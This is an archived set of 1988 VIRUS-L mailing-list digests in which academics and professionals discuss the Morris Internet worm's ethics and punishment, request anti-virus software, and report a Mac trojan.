home *** CD-ROM | disk | FTP | other *** search
/ 2,000 Greater & Lesser Mysteries / 2,000 Greater and Lesser Mysteries.iso / computer / virus / mys00496.txt < prev    next >
Encoding:
Text File  |  1994-06-10  |  607.7 KB  |  14,148 lines

  1. VIRUS-L Digest             Thursday, 1 Dec 1988         Volume 1 : Issue 27
  2.  
  3. Today's Topics:
  4. re: followup on Internet worm
  5. Internet Worm Punishment
  6. Re:  followup on Internet worm
  7.  
  8. ---------------------------------------------------------------------------
  9.  
  10. Date: Wed, 30 Nov 88 19:51:10 EST
  11. From: Mark W. Eichin <eichin@ATHENA.MIT.EDU>
  12. Subject: re: followup on Internet worm
  13.  
  14. The anonymous FTP hole is *NOT* one of the holes used in the attack;
  15. however, it is believed to have been discovered by Robert Morris, as
  16. are the other bugs it exploited.
  17.                 Mark Eichin
  18.             <eichin@athena.mit.edu>
  19.         SIPB Member & Project Athena ``Watchmaker''
  20.  
  21. ------------------------------
  22.  
  23. Date:    Wed, 30 Nov 88 19:38 EST
  24. From:    "Scott P Leslie" <UNCSPL@UNC.BITNET>
  25. Subject: Internet Worm Punishment
  26.  
  27. Hi,
  28.    If your going after analogies, then when the robber breaks into
  29. your house but doesn't steal or destroy anything, then he is charged
  30. with breaking and entering.  This is basically what I think Morris
  31. should be charged with, and there are appropriate laws that deal with
  32. that.  He appears to be guilty and will no doubt be found such, but he
  33. doesn't deserve to have his life ruined.  Community service or some
  34. other such lengthy (but not costly to society) should be given.  .
  35.  
  36. Scott P. Leslie (UNCSPL@UNC)
  37. Note: The University of North Carolina doesn't support my comments!
  38. Run! Or they will catch you..
  39.  
  40. ------------------------------
  41.  
  42. Date: Wed, 30 Nov 88 21:32:07 EST
  43. From: Russ Nelson <nelson@sun.soe.clarkson.edu>
  44. Subject: Re:  followup on Internet worm
  45.  
  46. No, it's the ftpd bug.  If you entered a long enough password, you
  47. could get a shell with *root* privileges.
  48.  
  49. - -russ
  50.  
  51. ------------------------------
  52.  
  53. End of VIRUS-L Digest
  54. *********************VIRUS-L Digest             Thursday, 1 Dec 1988         Volume 1 : Issue 28
  55.  
  56. Today's Topics:
  57. Request for Apple // anti-virus software (Apple //)
  58. Internet Worm report distribution
  59. lock on my door
  60.  
  61. ---------------------------------------------------------------------------
  62.  
  63. Date: Thu, 1 Dec 88 08:40 EST
  64. From: "Kevin O. Lepard" <SASQUATCH%ALBION.BITNET@IBM1.CC.Lehigh.Edu>
  65. Subject: Request for Apple // anti-virus software (Apple //)
  66.  
  67.  
  68. I've looked at the anti-virus programs available from this list, and
  69. they all seem to be Mac and PC programs.  Are there any available for
  70. the Apple // that someone could post?  I know that // users such (like
  71. me) are rare in the higher education world, but there are several
  72. viruses for the Apple //s out and I know a bunch of primary and
  73. secondary ed. people who would like to seem some anti-viral programs
  74. for their machines.
  75.  
  76. Anyone?  Or am I alone here?
  77.  
  78. Kevin Lepard
  79. Bitnet:  Sasquatch@albion.bitnet
  80.  
  81. ------------------------------
  82.  
  83. Date: Thu, 1 Dec 1988 9:46:06 EST
  84. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  85. Subject: Internet Worm report distribution
  86.  
  87. Well, I'm very convinced now that interest in the Internet Worm has
  88. not died, judging from the number of people who've requested copies of
  89. Gene Spafford's report.  There are still a couple of problems, though:
  90.  
  91. 1) The file is too big to distribute in one piece via BITNET.  At
  92. least with any degree of reliability.  Besides, it would be rude, and
  93. a senseless overload of the net to send out all the copies via BITNET.
  94.  
  95. 2) The file is in PostScript, and I really can't be printing copies on
  96. our PS printer and mailing them out.
  97.  
  98. I've had one very generous offer to make the file available via
  99. anonymous FTP (thanks Les!), and that will help out for all the people
  100. with Internet access.  My first thought was that people with Internet
  101. access would be the only ones who would want the paper, but I was
  102. wrong.  Nonetheless, anyone with Internet access can anonymous FTP the
  103. file from pine.circa.ufl.edu (IP # 128.227.128.55).  The file's name
  104. is tr823.ps.
  105.  
  106. Otto Stolz recommended that I make it available via the Postal Service
  107. to anyone who send a disk and Self Addressed Stamped Envelope to me,
  108. he even offerred to supply the same service to anyone in Europe
  109. (thanks Otto!).  No problem; anyone without Internet access who wants
  110. the PostScript file can send me a 360k or 1.2M 5 1/4" (DOS) disk with
  111. a self addressed stamped envelope, and I'll be glad to mail out the
  112. PostScript file.  Anyone who wants this, please send me e-mail
  113. (luken@spot.cc.lehigh.edu or luken@lehiibm1.bitnet) requesting my US
  114. mail address.
  115.  
  116. Finally, a problem still remains for people without access to a
  117. PostScript printer.  I don't have a solution for this yet,
  118. unfortunately, but I'm wide open to suggestions.
  119.  
  120. It should be noted that Gene Spafford's distribution policy is as
  121. follows:  "Permission is hereby granted to make copis of this work,
  122. without charge, solely for the purposes of instruction and research.
  123. Any such copies must include a copy of this title page and copyright
  124. notice.  Any other reproduction, publication, or use is strictly
  125. prohibited without express written permission."
  126.  
  127.  
  128. Ken
  129.  
  130. ------------------------------
  131.  
  132. Date: Thu, 1 Dec 88 10:11:47 CDT
  133. From: Len Levine <len@evax.milw.wisc.edu>
  134. Subject: lock on my door
  135.  
  136. >>                                                    ... For example, it
  137. >>is a fact that the average lock on the entrance to the average American
  138. >>home can be picked in thirty seconds or less.  However, you won't find
  139. >>any robber arguing that it was the homeowner's fault that he didn't have
  140. >>a better lock on the door!
  141. >
  142. >Even though they probably should have.  Sincerely!
  143.  
  144. No!  I choose to have open windows on my house and doors that can be
  145. easily opened and closed.  To argue that I should live in a bank vault
  146. to avoid the thugs is wrong.  I should live as I choose, and if a thug
  147. enters and robs, or just enters, he or she is at fault and should be
  148. delt with.  If my insurance goes up, that is my problem, but your
  149. right to walk in because I have installed poor or no locks is not
  150. granted.
  151.  
  152. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  153. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  154. | Professor, Computer Science             Office (414) 229-5170 |
  155. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  156. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  157. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  158.  
  159. ------------------------------
  160.  
  161. End of VIRUS-L Digest
  162. *********************VIRUS-L Digest              Friday, 2 Dec 1988          Volume 1 : Issue 29
  163.  
  164. Today's Topics:
  165. Internet Worm Report in the UK
  166. Is time money? (Internet Worm)
  167. Final Call for Survey Responses
  168. RE: Attitude of Alvi brothers (PC Brain virus)
  169. computer virus institute
  170. Choice of crypto keys
  171. RE: James Mathiesen's "Ethics of a worm" (Internet Worm)
  172. Internet Worm (will it ever end :-)
  173.  
  174. ---------------------------------------------------------------------------
  175.  
  176. Date:     1-DEC-1988 10:49:07 GMT
  177. From:     F026@CPC865.EAST-ANGLIA.AC.UK
  178. Subject:  Internet Worm Report in the UK
  179.  
  180.  
  181. It would make sense to have just ONE copy of the Internet Worm Report sent
  182. across the ocean blue to this fair isle. If anyone already has a copy,
  183. let me know. Otherwise if someone would be kind enough to chop it into
  184. bite-size chunks small enough for BITNET to digest and mail it to me (I can't
  185. FTP from here) I'd be prepared to mail it to people on JANET (the British
  186. "Joint Academic NETwork").
  187. Please mail me first, to make sure it can get through.
  188.  
  189.       cheers,
  190.  
  191.                Mike
  192.  
  193. * Mike Salmon,                 Phone +44 603 56161 x2875   Time GMT           *
  194. * Climatic Research Unit,      JANET m.salmon@uea.cpc865   UUCP _not_ via UKC *
  195. * University of East Anglia,  BITNET f026@cpc865.uea.ac.uk  BIX msalmon       *
  196. * Norwich, Norfolk,             ARPA f026%cpc865.uea.ac.uk@cunyvm.cuny.edu    *
  197. * United Kingdom           Elsewhere f026%cpc865.uea@ukacrl.bitnet            *
  198. *  -  -  -  -  "How far can you comfortably spit a mail gateway?" -  -  -  -  *
  199.  
  200. ------------------------------
  201.  
  202. Date:    Thu,  1 Dec 88 19:57:48 CST
  203. From:    Richard G Larson <U09254@UICVM>
  204. Subject: Is time money? (Internet Worm)
  205.  
  206. Alan T. Krantz asks:
  207. > Would a person (or persons) who was detained (or put to work) during
  208. > the Virus attack lost XXX time (would have been doing XXX time of
  209. > productive work)?
  210.  
  211. I have up until now just reading what goes by on this list; this makes
  212. me ask the question: does all time belong to society (Society?)?  Is
  213. not a person entitled not to have his time wasted?  Would the same
  214. argument apply to increasing the number of hours of work per day by
  215. factory workers without an increase in pay?  (Should we ask what
  216. productive work they would have been doing in their off time?)
  217.  
  218. ------------------------------
  219.  
  220. Date:         Thu, 01 Dec 88 21:03:42 EST
  221. From:         Ron Dawson <053330@UOTTAWA>
  222. Subject:      Final Call for Survey Responses
  223.  
  224. Hello,
  225.  
  226. If anyone is still interested in responding to the survey, please try
  227. and send your responses to 053330@UOTTAWA by December 3rd.
  228.  
  229. Regarding Martin's comments about questions 4-10, I do not see a real
  230. problem.  The purpose is to determine how people perceive themselves,
  231. not how I would perceive them.  Whether they are really an 'EXPERT' is
  232. another question altogether.
  233.  
  234. The questions that I wish I could change are 22 and 23, but I will
  235. speak more on this when I send our summarized results to the list.
  236.  
  237. So, once again, thank you for your cooperation.
  238.  
  239. - - Ron Dawson
  240.   Systems Science
  241.   University of Ottawa
  242.   053330@UOTTAWA.BITNET
  243.  
  244. ------------------------------
  245.  
  246. Date: Thu, 01 Dec 88 21:36:45 CST
  247. From: C482529@UMCVMB
  248. Subject: RE: Attitude of Alvi brothers (PC Brain virus)
  249.  
  250. Stephen Tihor <TIHOR@NYUACF.BITNET> writes:
  251. >... The story there was that
  252. >Alvi sold bootlegged copies of American Software since there is no
  253. >software copyright in Pakistan.  But in a moral act when a foreigner
  254. >bought a copy planning to take it back to the States or the EEC (he
  255. >assumed) where it would be illegal he have him a virus infected copy
  256. >since that was stealing the software.  A very legal attitude.
  257.  
  258. Perhaps, but what about perfectly innocent computer users who may
  259. be infected when the virus spreads?  These people have nothing to
  260. do with the original 'crime', which Alvi took upon himself to 'punish.'
  261. A more correct way to do this would be to modify the Lotus 1-2-3,
  262. WordStar, whatever, so that the program itself is subtly malicious, but
  263. *not* so that it would copy this maliciousness around...
  264.  
  265. - -tony
  266. c482529@umcvmb.bitnet
  267. c482529@umcvmb.missouri.edu
  268.  
  269. ------------------------------
  270.  
  271. Date: Thu, 1 Dec 88 21:08:22 CDT
  272. From: Len Levine <len@evax.milw.wisc.edu>
  273. Subject: computer virus institute
  274.  
  275. There has been some discussion in this forum of the computer virus
  276. institute.  Recently I sent them some mail and got on their mailing
  277. list, their letterhead states that the address is:
  278.  
  279. The International Computer Virus Institute
  280. 3030 Bridgeway Boulevard
  281. Sausalito, CA 94965
  282. (415) 332-8548  FAX (415) 331-0946
  283.  
  284. They have prepared a "Mission Statement" which, in my opinion is about
  285. what one might expect such a group to state.  One item (#8) in their
  286. list states:
  287.  
  288. "Make available immediately a video program and a fact sheet to
  289. motivate all computer users to take virus infections seriously and
  290. adopt appropriate defensive actions."
  291.  
  292. good idea.
  293.  
  294. The international panel of advisors established by this group consists
  295. of experts from universities.  I am currently one of thier experts.  I
  296. do not believe that the press release that I have a draft of is to be
  297. made public yet, but it contains the names of several University
  298. faculty who are prepared to talk, advise etc. about viruses.
  299.  
  300. With luck and careful editing a group like this can do some good.  I
  301. will keep you informed of their actions as they occur.
  302.  
  303. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  304. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  305. | Professor, Computer Science             Office (414) 229-5170 |
  306. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  307. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  308. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  309.  
  310. ------------------------------
  311.  
  312. Date:  Wed, 30 Nov 88 18:08 EST
  313. From:  WHMurray@DOCKMASTER.ARPA
  314. Subject:  Choice of crypto keys
  315.  
  316. Mitch asks (of L. Kiem):
  317.  
  318. >Now forgive my possible ignorance, but it seems to me that if a  virus
  319. >could  bypass an encryption  algorithm, the key used  wouldn't matter.
  320.  
  321. It is a desirable, but not necessary, property of an encryption
  322. algorithm that its strength be independent of the key chosen.  Even the
  323. DES has eight weak keys (out of 2**56).
  324.  
  325. William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
  326. 2000 National City Center Cleveland, Ohio 44114
  327. 21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840
  328.  
  329. ------------------------------
  330.  
  331. Date:  Tue, 22 Nov 88 19:55 EST
  332. From:  Lynn R Grant <Grant@DOCKMASTER.ARPA>
  333. Subject:  RE: James Mathiesen's "Ethics of a worm" (Internet Worm)
  334.  
  335. Suppose you went out one night, leaving your back door unlocked.  A
  336. good samaritan who was walking through the neighborhood, for some
  337. reason checking doorknobs, noticed that your door was not locked.
  338. Concerned that a theif might discover your oversight and steal all
  339. your stuff, she decided to teach you a lesson, so you would remember
  340. to lock your door in the future.  What she did is take your garbage
  341. cans (or someone else's; I don't think it makes a difference) and dump
  342. them all over your floors.
  343.  
  344. Upoon returning home and discovering what had been done to your house,
  345. you would probably be irate because
  346.    1) You resented the fact that someone had inflicted this anti-social
  347.       behavior upon you,
  348.    2) You worried about what could have happened had the culprit been a
  349.       real thief, rather than a messy good samaritan,
  350.    3) You had to spend a bunch of time cleaning up the garbage, and
  351.    4) You had to pay someone to clean your carpets, and
  352.    5) You had to cancel a dinner party scheduled for the next day, since
  353.       the house was in no state to entertain in.
  354.  
  355. I think this discribes a non-computer situation (the kind of situation
  356. that laws and ethics are better at dealing with, at least so far) that
  357. parallels that of the RTM worm (assuming that RTM, or whoever the
  358. courts decide is responsible for the worm, was trying to teach us a
  359. lesson, rather than just breaking the network "because it was there.")
  360.  
  361. Now suppose you discovered who the G.S.  was, perhaps because she
  362. bragged about the lesson she had taught you, or maybe because someone
  363. saw her performing her act.  You told the police, who arrested her and
  364. brought her to trial.  I am no lawyer, but here is what I think a
  365. judge or jury would probably decide:
  366.  
  367.   1) and 2) fall into the category of mental anguish; you have not actually
  368.   been harmed, you just worried a lot.  Probably the G.S. would either get
  369.   a short jail term (<30 days, maybe serving only on weekends) or have to
  370.   perform community service for a while.  The idea is that there has to
  371.   be some punishment, to remind the G.S. that her behavior will not be
  372.   tolerated, but it's not really a big thing, so no long sentence is
  373.   in order.  ("Let the punishment fit the crime.")
  374.  
  375.   3) and 4) cost you some effort and money (even if you did the work youself,
  376.   there's lost opportunity cost), so the G.S. would probably have to reimburse
  377.   you for your carpet bills, and maybe your own effort at some hourly wage.
  378.  
  379.   5) would probably fall into the same category as 1) and 2).  However, if
  380.   the party you had to cancel was a business event, crucial to winning a
  381.   large contract, I'm not sure what the courts would say.  If they did
  382.   extract a penalty, it would probably be a monetary one.
  383.  
  384. So, returning from the analogy to the case at hand, I think it would be
  385. reasonable for RTM (who is innocent till proven guilty) or whoever the
  386. culprit turns out to be to perform community service, perhaps in a way
  387. that doesn't make it easy for him to do more virus experiments, in case
  388. he goes sour again, and to pay for the monetary costs of his actions.
  389.  
  390. I do not feel we should thank him for not trashing our data, and I do
  391. not think he should be praised for pointing out our security flaws by
  392. breaking into the system.  This sort of behavior is not tolerated in
  393. non-computer areas of society; why should computers be different.  Try
  394. walking into a bank with a fake gun and telling them it is a stick-up,
  395. or pretend hijacking a plane.  I believe you will be treated much worse
  396. by the authorities than what I am proposing for RTM, or whoever.
  397.  
  398.      Lynn R Grant
  399.      Technical Consultant
  400.      Computer Associates International, Inc.
  401.  
  402. My opinions are my own, and not neccessarily those of my employer.
  403.  
  404.                       Thanx,
  405.                          Lynn
  406.  
  407. ------------------------------
  408.  
  409. Date: Fri, 2 Dec 88 08:22 EST
  410. From: Mitchel Ludwig <KMFLUDW@VAX1.CC.LEHIGH.EDU>
  411. Subject: Internet Worm (will it ever end :-)
  412.  
  413.     Ok, guys, forgive me if this has been done before, but I've
  414. got what I think to be an interesting question :
  415.  
  416.     Once  it  was determined that   the only bad   side  effect of
  417. Morris's worm  was that it  propagated itself  into  infinity, causing
  418. host systems some problems, would it have been possible to add code to
  419. the program?  What I mean is would it have been possible to add to the
  420. original source a section of code that would :
  421.  
  422.     a) Check to see if the sendmail bug was present on the host
  423.        system and if so, fix it.
  424.  
  425.     b) Mail itself to all the sites on the hosts SYSTEMS list.
  426.  
  427.     c) Remove itself from the host system.
  428.  
  429.     In effect, wouldn't this have eliminated the problem by use of
  430. the same bugs which allowed it in the first place?  I ask this because
  431. a  friend of mine (who is  a pre-med  student) compared  it to using a
  432. disease to cure itself.  In other words, using a  less virulent strain
  433. of a virus to be used as  a way of  building up  ones immune system to
  434. that very virus.   Sounded  reasonable so I   ask ya, is it  possible?
  435. Also, if this has been proposed  before, can  someone point me  at the
  436. date ranges of the discussion so  I can grab  the archives?  My friend
  437. and I will be most appreciative.
  438.  
  439.  
  440.             Danka Dude.
  441.  
  442.             Mitch
  443.  
  444. ____________     _____/--\_____
  445. \______  ___)   (_   _    _____)    UUCP   : lehi3b15!rastro!mfl
  446.      __\ \_______/  / `--'          BITnet : MFL1@lehigh.bitnet
  447.      )Space for Rent`|=(            INTnet : KMFLUDW@vax1.cc.lehigh.edu
  448.      \--------------'
  449. Disclaimer?  I don't need one.  No body takes me seriously anyway...
  450.  
  451. ------------------------------
  452.  
  453. End of VIRUS-L Digest
  454. *********************VIRUS-L Digest              Friday, 2 Dec 1988          Volume 1 : Issue 30
  455.  
  456. Today's Topics:
  457. Font Fooler (Mac)
  458. Re: Font Fooler (Mac)
  459. RE: Various anti-virus software
  460. genetic engineering of computer viruses
  461. Is Morris the Only Culpable Party?
  462.  
  463. ---------------------------------------------------------------------------
  464.  
  465. Date:         Fri, 02 Dec 88 09:17:19 EST
  466. From:         Jim Kenyon <TGHVET@vm.utcs.utoronto.ca>
  467. Subject:      Font Fooler (Mac)
  468.  
  469. We have had two people that have been give a programme called
  470. Font Fooler (Mac) that was supposed to be a neat utility for playing
  471. with Fonts.  When run, (after checking for the usual little critters)
  472. the programme finds Font files and trashes them.
  473.  
  474. Anyone else seen this little gem?
  475.  
  476. Jim Kenyon (TGHVET@UTORONTO
  477. Director, Veterinary Services
  478. Toronto General Hospital
  479. Lecturer, Department of Anaesthesia
  480. University of Toronto
  481.  
  482. ------------------------------
  483.  
  484. Date:         Fri, 02 Dec 88 10:07:55 EST
  485. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  486. Subject:      Re: Font Fooler (Mac)
  487.  
  488. >From:         Jim Kenyon <TGHVET@vm.utcs.utoronto.ca>
  489. >Subject:      Font Fooler (Mac)
  490.  
  491. >We have had two people that have been give a programme called
  492. >Font Fooler ... When run, (after checking for the usual little critters)
  493. >the programme finds Font files and trashes them.
  494.  
  495. This sounds like a local Trojan. We haven't had any reports of it around
  496. here. I'll forward this to the INFO-MAC list -- if I get any responses I'll
  497. post them back.
  498.  
  499. - --- Joe M.
  500.  
  501. [Ed. Thanks for the prompt reply, Joe!  For those who may be wondering
  502. how we could get a query and an answer to the query in the same
  503. digest, I forwarded the message to Joe when I received it, as Joe has
  504. more Mac experience than I (read: any Mac experience at all) and has
  505. graciously offerred to help out with Mac problems whenever possible.
  506. Thank you for your time, Joe!]
  507.  
  508. ------------------------------
  509.  
  510. Date: Fri, 2 Dec 88 10:58:48 est
  511. From: preedy@nswc-wo.arpa
  512. Subject: RE: Various anti-virus software
  513.  
  514. I'd also like to hear something about anti-virus software for Sun Work
  515. Stations.
  516.        Pat Reedy
  517.  
  518. ------------------------------
  519.  
  520. Date:     Fri,  2 Dec 88 10:29 CDT
  521. From:     David W. Richardson <C044DWR@UTARLG>
  522. Subject:  genetic engineering of computer viruses
  523.  
  524. As Mitchel Ludwig (kmfludw@vax1.cc.lehigh.edu) pointed out, a virus
  525. COULD be used to eradicate another virus.  It could also be used for
  526. many other things, such as killing off worms, trojan horses, etc.  It
  527. could even be used to update system files or software on PCs (or
  528. mainframes, or whatever).
  529.  
  530. (putting on flame-retardent)
  531. But if I EVER HEAR OF ANYONE DOING THIS TO MY SYSTEM WITHOUT MY
  532. PERMISSION, I WILL CALL THE APPROPRIATE AUTHORITIES.
  533. (removing flame-retardent)
  534.  
  535. If the virus were nice enough to alert you of what it was doing AND
  536. give you a chance to stop it in its tracks, that MIGHT be ok, provided
  537. it also had an auto-eradication option and didn't interfere in the use
  538. of my computer in any way.
  539.  
  540. Any comments?  Direct useful stuff to the list, flames or trivial
  541. stuff to me.
  542.  
  543. David Richardson
  544. bitnet c044dwr@utarlg  (this address will change in early January, do a
  545.                         REVEIW from listserv@lehiibm1 around 1/15/89
  546.                         for my new address)
  547. phonenet:(817)273-3656
  548. SlowNet: PO 192053 Arlington, TX  76013
  549.  
  550. ------------------------------
  551.  
  552. Date: 2 December 1988, 13:53:29 EST
  553. From: John A. Pershing Jr.                           PERSHNG  at YKTVMH
  554. Subject: Is Morris the Only Culpable Party?
  555.  
  556. I am somewhat surprised at the lack of comments on the culpability of
  557. (1) the programmer who implemented the gaping trap door in the mailer
  558. which RTM exploited, and/or (2) the organizations that
  559. sold/distributed this software.
  560.  
  561. Is Morris the only person to blame for the debacle?
  562.  
  563.       John Pershing
  564.       IBM Research, Yorktown Heights
  565.  
  566. ------------------------------
  567.  
  568. End of VIRUS-L Digest
  569. *********************VIRUS-L Digest              Monday, 5 Dec 1988          Volume 1 : Issue 31
  570.  
  571. Today's Topics:
  572. The Virus
  573. is morris the only ...
  574. Morris some more
  575. Re: Low level format (PC)
  576. Re: Response to Morris comments
  577.  
  578. ---------------------------------------------------------------------------
  579.  
  580. Date:         Mon, 28 Nov 88 11:29:52 EST
  581. From:         Dan Bornstein <ST702174@BROWNVM>
  582. Subject:      The Virus
  583.  
  584.  ...forwarded from WEIRD-L.
  585.  
  586. - ----------------------------Original message----------------------------
  587.  
  588.                               The Virus
  589.  
  590.      No installation had been hit by a computer virus for some time.  By
  591. God, they had all taken enough precautions since the last one a few
  592. years ago.  Suddenly, however, people started noticing that the
  593. calculations weren't getting done quite so fast and started wondering...
  594.      Everyone suddenly seemed to be utterly concerned; everyone who even
  595. seldomly used a computer.  There was a growing interest in learning how
  596. to program so you could "disinfect my computer" "just in case."  Even
  597. secretaries using computers only for word processing got involved.  And
  598. yet, things still seemed to slow down.
  599.      Career programmers were taking longer to complete their projects,
  600. essay-writers as well. "Just making sure I'm not infected; that's all."
  601.      Eventually, even the ATM machines started slowing down.  News
  602. broadcasters had to wait for their slow-moving teleprompters to catch up.
  603. Finally, prime time ground to a halt as people were hypnotized by the
  604. flickering words, ever faster, as more and more people added to it, in
  605. dozens of languages, in an endless feedback loop:
  606.  
  607.  
  608. "Make this appear on somebody else's screen."
  609.  
  610. ------------------------------
  611.  
  612. Date: Fri, 2 Dec 88 20:12:22 CDT
  613. From: Len Levine <len@evax.milw.wisc.edu>
  614. Subject: is morris the only ...
  615.  
  616. >John A. Pershing Jr. states:
  617.  
  618. >I am somewhat surprised at the lack of comments on the culpability of
  619. >(1) the programmer who implemented the gaping trap door in the mailer
  620. >which RTM exploited, and/or (2) the organizations that
  621. >sold/distributed this software.
  622.  
  623. >Is Morris the only person to blame for the debacle?
  624.  
  625. I had a chance to speak at length with a system programmer at a
  626. meeting of the Computer Professionals for Social Responsibility
  627. meeting about this.  I quoted the comment from the author of the trap
  628. about its use in "avoiding certain managerial barriers" (not a direct
  629. quote, but about right).  His response was that the trap was regularly
  630. used by him in regaining control for users who forgot or lost the
  631. password for root and thus had lost access to their own systems.
  632.  
  633. No arguments on my part were of any use at all, not a suggestion that
  634. more than one root level account be installed with one password known
  635. only by him, his point was that such traps are just plain the only way
  636. to regain control after such a failure.
  637.  
  638. I judge him as totally wrong.  The use of a known non-passworded
  639. access port to a dial-in (or worse) system when other approaches are
  640. feasible (and they are) is folly.
  641.  
  642. This does not mean that morris had the right to penetrate production
  643. systems via this trap.  It does mean that others have responsibility
  644. too.
  645.  
  646. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  647. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  648. | Professor, Computer Science             Office (414) 229-5170 |
  649. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  650. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  651. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  652.  
  653. ------------------------------
  654.  
  655. Date:     Fri, 2 Dec 88 23:52:38 EST
  656. From:     Jefferson Ogata (me!) <OGATA@UMDD>
  657. Subject:  Morris some more
  658.  
  659. The analogy of breaking in and dumping trash on the floor of your house
  660. is sorely lacking in a couple of ways.
  661.  
  662. One is that the house should be a business office where a number of
  663. people work every day, and make a certain amount of money doing it.
  664. The computer systems infected by the worm were not just places where
  665. people go to relax after a long day.  The computer systems were an
  666. essential element of the BUSINESS of those people.  By trashing
  667. their office the G.S. puts those people out of work for a day.  And
  668. while the criminal penalty still may not be high, imagine the cost
  669. of putting tens of thousands of people out of work for a day.
  670.  
  671. Another weak spot is the whole idea of regarding Morris as a "good
  672. Samaritan", out to inform the user of the foolishness of his leaving
  673. the back door unlocked.  Certainly this is NOT what Morris intended
  674. to do.
  675.  
  676.  
  677. Somebody else asked about the culpability of the writer of the debug
  678. feature of sendmail.  I think it's quite clear that this culpability
  679. is nil.  The debug feature was there for a reason; clearly it should
  680. not have been left on after testing, but I'm sure it came in handy
  681. during testing.  Suppose you order a locking doorknob assembly from
  682. some company.  It comes in an unlocked state.  You install the new
  683. lock, but leave the office without actually locking it.  A burglar
  684. steals your pencil sharpener.  Should we blame the designer of the
  685. doorknob?
  686.  
  687. - - Jeff Ogata
  688.  
  689. ------------------------------
  690.  
  691. Date:         Sat, 03 Dec 88 10:58:37 EST
  692. From:         "Homer W. Smith" <CTM%CORNELLC.BITNET@IBM1.CC.Lehigh.Edu>
  693. Subject:      Re: Low level format (PC)
  694.  
  695.      How do I get a program that will do a lowest level scrubb
  696. and reformat on my pc/xt hard disk?
  697.  
  698.      Homer  CTM@CORNELLC
  699.  
  700. ------------------------------
  701.  
  702. Date:         Sat, 03 Dec 88 11:08:31 EST
  703. From:         "Homer W. Smith" <CTM%CORNELLC.BITNET@IBM1.CC.Lehigh.Edu>
  704. Subject:      Re: Response to Morris comments
  705.  
  706.      In reply to Peter Scott's comments about my comments on
  707. Mr. Morris.
  708.  
  709.      Amends in no way assumes an eye for an eye.  Morris can
  710. not possibly 'pay-back' for all the 'damage'.  He can however
  711. make amends.  Amends is what ever is necessary fo people to
  712. be glad that he exists and are willing and eager to have him
  713. have the free run of the land again.
  714.  
  715.      For example, if Morris were to discover or prove some
  716. amazing computer theorem that immediately allowed people
  717. to close every security hole in every computer everywhere,
  718. then surely people would forgive Morris the untold man hours
  719. he wasted, because he just came up with a way of saving
  720. them 1000*untold manhours in the future.
  721.  
  722.      Surely intelligent and compassionate people can figure
  723. out what is needed and wanted and sufficient for Morris
  724. to re-justify his existance to us.
  725.  
  726.      You know even if he 'payed back' the lost man hours
  727. and money, that would not necessarily be enough for anyone
  728. to really like him or want him around.  Amends means more
  729. than just fixing the toy you broke.  That just sets you even,
  730. which does not set you even at all.
  731.  
  732.      Amends is a healing relationship where in both parties are
  733. agree its OK it all happened.  For example if
  734. Morris had never crashed the internet, he would never have had
  735. to make amends and maybe that amazing computer theorem would never
  736. have been developed, so the people would still be at risk in their
  737. futures.
  738.  
  739.      Resolution always comes because things are made BETTER because the
  740. bad thing happened.  Recovering even-ness, things as they were, is
  741. not sufficient.   The bad memories still remain.
  742.  
  743.      Of course I am not implying that good things only come from
  744. bad things, or that we should MAKE bad things occur so that good
  745. things can come from them.  I am implying that SOMETIMES good
  746. things occur because bad things have occured first and the resolved
  747. and healed state is better and more secure than before.
  748.  
  749.      As for nailing Morris to the wall, well if a person is a total
  750. ingrate and unredeemable in all aspects, then hanging him out to
  751. dry for all to see may be the most productive thing we can do
  752. with his body.  But in general, breaking someone elses toy
  753. because they broke yours leads to a doubly decreased GNP and
  754. is a sin against everbody.
  755.  
  756.      Of course as a deterrent through example, breaking the toys
  757. of those that broke yours acts to prevent the GNP from falling
  758. futher by dissuading others from similar irresponsible acts.
  759. But AMENDS properly done causes a resurgence in the GNP over and
  760. above the original course of operation and CAN cause a resurgence
  761. above and beyond WHAT IS POSSIBLE in the normal course of operation.
  762.  
  763.      It is the wise fool who invests in such activity.
  764.  
  765.      Homer Wilson Smith
  766.  
  767. ------------------------------
  768.  
  769. End of VIRUS-L Digest
  770. *********************VIRUS-L Digest              Monday, 5 Dec 1988          Volume 1 : Issue 32
  771.  
  772. Today's Topics:
  773. Re: Morris's intent
  774. RE: More on Morris
  775. FYI: SECURITY has returned
  776. Vested interest in viruses?
  777. Re:  Lock on my door
  778. Paper virus hits the classifieds
  779.  
  780. ---------------------------------------------------------------------------
  781.  
  782. Date:         Sat, 03 Dec 88 12:23:23 EST
  783. From:         "Homer W. Smith" <CTM%CORNELLC.BITNET@IBM1.CC.Lehigh.Edu>
  784. Subject:      Re: Morris's intent
  785.  
  786.      I would like to remind everyone that Mir system was flawed.
  787.  
  788.      Homer
  789.  
  790. [Ed. In Gene Spafford's Internet Worm report, he raises some very
  791. interesting possibilities as to the author(s)'s identity.  The code
  792. appears quite inconsistant, ranging from highly optimized
  793. professionally written code (e.g., the crypt function works 9 times
  794. faster than the BSD version") to amateurish code with multiple
  795. (unused) global variables and subroutines that never get called.
  796. Since Morris has not made a public statement acknowledging that he was
  797. the (sole) author of the worm, to the best of my knowledge, is it safe
  798. to even assume that he did (all) the work?]
  799.  
  800. ------------------------------
  801.  
  802. Date: Sat, 3 Dec 88 13:51 EST
  803. From: Chris Bracy <KCABRAC@VAX1.CC.LEHIGH.EDU>
  804. Subject: RE: More on Morris
  805.  
  806. >>>                                                    ... For example, it
  807. >>>is a fact that the average lock on the entrance to the average American
